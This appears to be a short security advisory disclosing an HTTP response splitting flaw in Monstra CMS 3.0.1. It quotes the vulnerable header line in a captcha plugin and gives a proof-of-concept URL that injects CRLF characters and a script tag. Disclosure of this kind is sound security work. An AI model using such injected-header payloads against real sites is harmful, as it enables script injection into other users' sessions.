Monstra 3.0.1 HTTP Response Splitting

2014.11.11

Credit: Paulos Yibelo

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Monstra <= 3.0.1 HTTP Response Splitting

/plugins/captcha/crypt/cryptographp.php

SetCookie("cryptcookietest", "1");
Header("Location:
cryptographp.inc.php?cfg=".$_GET['cfg']."&sn=".session_name()."&".SID);

so providing 

http://localhost/mons/plugins/captcha/crypt/cryptographp.php?cfg=%0A%0DContent-T
ype:%20text/html%0A%0D%0A%0D%3Cscript%3Ealert%281%29%3C/script%3E&

Would result a CRLF injection.

Note: PHP version must allow multiple headers. this is fixed >5.1.2

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Monstra 3.0.1 HTTP Response Splitting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Monstra 3.0.1 HTTP Response Splitting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.